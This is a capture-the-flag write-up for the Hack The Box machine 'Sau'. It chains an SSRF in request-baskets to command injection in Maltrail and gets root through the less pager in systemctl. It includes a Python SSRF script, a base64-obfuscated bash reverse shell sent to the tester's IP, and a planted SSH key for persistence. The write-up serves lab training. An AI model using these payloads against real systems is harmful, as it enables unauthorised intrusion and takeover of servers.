# Sau - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Sau is a fun, easy-rated HTB machine created by [sau123](https://app.hackthebox.com/users/201596)

The user involves a couple of CVEs: an SSRF vulnerability in `request-basket` and an RCE in `Maltrail`  
For root, we break out from `less` pager in `systemctl` and spawn an interactive system shell.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.098s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
```

```console
opcode@debian$ nmap -sC -sV -p 22,80,8338,55555 -oN sau.nmap 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.095s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
|   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sat, 20 Jan 2024 07:16:35 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sat, 20 Jan 2024 07:16:07 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sat, 20 Jan 2024 07:16:08 GMT
|_    Content-Length: 0

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The ports 22 (SSH) and 55555 are open, whereas ports 80 and 8338 are filtered.  

## SSRF in `request-basket`

Visiting <http://10.10.11.224:55555/> in a browser leads to an instance of [request-basket](https://github.com/darklynx/request-baskets), version 1.2.1  
I think it is a service similar to `ReqBin` or `Burp Collaborator`.

![1](images/1.png)

We can guess the vulnerability to be SSRF because webhooks are involved and couple ports are filtered.  
Googling for "request basket exploit", I found the [advisory for requests-basket SSRF](https://github.com/advisories/GHSA-58g2-vgpg-335q)  
The advisory also links to a more detailed post: <https://notes.sjtu.edu.cn/s/MUUhEymt7>

After going through the blog, we can try to replicate it.  
I'd have the server make a request to my `tun0` IP: 10.10.14.109

First, we need a listener:

```console
opcode@debian$ python3 -m http.server
```

```console
opcode@debian$ curl -XPOST http://10.10.11.224:55555/api/baskets/test -d '{"forward_url": "http://10.10.14.109:8000/opcode","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}'
{"token":"4Ki243MchJJ-czexVWJrfBDcnVQ5-VtktHedeFC2Td7v"}
```

To trigger the SSRF, another request is needed:

```console
opcode@debian$ curl http://10.10.11.224:55555/test
```

I immediately got a hit:

```log
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.224 - - [14/Jul/2023 20:44:49] code 404, message File not found
10.10.11.224 - - [14/Jul/2023 20:44:49] "GET /opcode HTTP/1.1" 404 -
```

Playing with the parameters, I learnt that setting `proxy_response` to `true` makes the response body visible.  
We can try making a request to the filtered port 80:

```console
opcode@debian$ curl -X POST http://10.10.11.224:55555/api/baskets/opcode -d '{"forward_url": "http://127.0.0.1:80","proxy_response": true,"insecure_tls": false,"expand_path": true,"capacity": 250}'
{"token":"UXx0IZupmFeyv3oP6lRWntZsx2zsg2l2d3br0L16gxxR"}
```

And the trigger:

```console
opcode@debian$ curl http://10.10.11.224:55555/opcode
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta http-equiv="Content-Type" content="text/html;charset=utf8">
        <meta name="viewport" content="width=device-width, user-scalable=no">
        <meta name="robots" content="noindex, nofollow">
        <title>Maltrail</title>
[--SNIP--]
        <div id="bottom_blank"></div>
        <div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>

        <ul class="custom-menu">
            <li data-action="hide_threat">Hide threat</li>
            <li data-action="report_false_positive">Report false positive</li>
        </ul>
        <script defer type="text/javascript" src="js/main.js"></script>
    </body>
</html>
```

An instance of Maltrail version 0.53 is running on port 80.

Manually exploiting the SSRF is a chore: you need to destroy the previous basket to use the same name, and triggering it requires two requests with `curl`.  
Therefore, I wrote a Python script to automate the steps: [ssrf_request.py](ssrf_request.py)

```py
import requests
from argparse import ArgumentParser


def ssrf(host, name, target):
    url = f'{host}/api/baskets/{name}'
    payload = {
        'forward_url': target,
        'proxy_response': True,
        'insecure_tls': False,
        'expand_path': True,
        'capacity': 250
    }

    r = requests.post(url, json=payload, proxies=proxy)

    return r.json()['token']


def trigger(host, name):
    r = requests.get(f'{host}/{name}', proxies=proxy)

    return r.text


def destroy(host, name, token):
    url = f'{host}/api/baskets/{name}'
    header = {'Authorization': token}

    r = requests.delete(url, headers=header, proxies=proxy)

    return r.status_code


if __name__ == "__main__":
    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    parser = ArgumentParser(add_help=True, description='SSRF PoC for request-baskets')
    parser.add_argument('--url', default='http://10.10.11.224:55555', help='URL to vulnerable service')
    parser.add_argument('--name', default='opcode', help='Name of basket')
    parser.add_argument('--target', default='http://127.0.0.1', help='Target URL for SSRF')

    options = parser.parse_args()

    token = ssrf(options.url, options.name, options.target)
    resp = trigger(options.url, options.name)
    print(resp)

    status_code = destroy(options.url, options.name, token)
    assert(status_code == 204)
```

```console
opcode@debian$ python3 ssrf_request.py --target http://127.0.0.1
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta http-equiv="Content-Type" content="text/html;charset=utf8">
        <meta name="viewport" content="width=device-width, user-scalable=no">
        <meta name="robots" content="noindex, nofollow">
        <title>Maltrail</title>
[--SNIP--]
        <div id="bottom_blank"></div>
        <div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>

        <ul class="custom-menu">
            <li data-action="hide_threat">Hide threat</li>
            <li data-action="report_false_positive">Report false positive</li>
        </ul>
        <script defer type="text/javascript" src="js/main.js"></script>
    </body>
</html>
```

## Remote Code Execution in Maltrail

Googling for "maltrail exploit", I found <https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/>  
It is an unauthenticated OS command injection.

In the provided PoC, they make a POST request to `/login`  
Since the SSRF only allows us to make GET requests, we can try specifying the parameters from POST body as URL parameters:

```console
opcode@debian$ python3 ssrf_request.py --target 'http://127.0.0.1/login?username=;`ping+-c+2+10.10.14.113`'
```

It worked, and I received the ping packets.  
To get a reverse shell:

```console
opcode@debian$ python3 ssrf_request.py --target 'http://127.0.0.1/login?username=;`echo+YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA5LzkwMDEgMD4mMScK|base64+-d|bash`'
```

I received a shell as user `puma`:

```console
puma@sau:/opt/maltrail$ id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
```

To upgrade the shell, we can generate SSH keys:

```console
puma@sau:~$ ssh-keygen -t ecdsa
puma@sau:~$ mv ~/.ssh/id_ecdsa.pub ~/.ssh/authorized_keys
```

The `id_ecdsa` can be used for SSH:

```console
opcode@debian$ chmod 600 id_ecdsa
opcode@debian$ ssh -i id_ecdsa puma@10.10.11.224
```

## Abusing `less` pager in `systemctl` for EoP

```console
puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
```

I was aware of a `systemctl` quirk thanks to this tweet: <https://twitter.com/0xdea/status/1638097349007245314>

![2](images/2.png)

Similar to `journalctl` on the box `Traverxec`, we can abuse this quirk with `systemctl`.  
If we make the terminal small and run the sudoers command, the `less` pager would get invoked:

```console
puma@sau:~$ sudo systemctl status trail.service
```

Once the pager spawns, we can get root shell with `!sh`

```console
!sh
# id
uid=0(root) gid=0(root) groups=0(root)
```
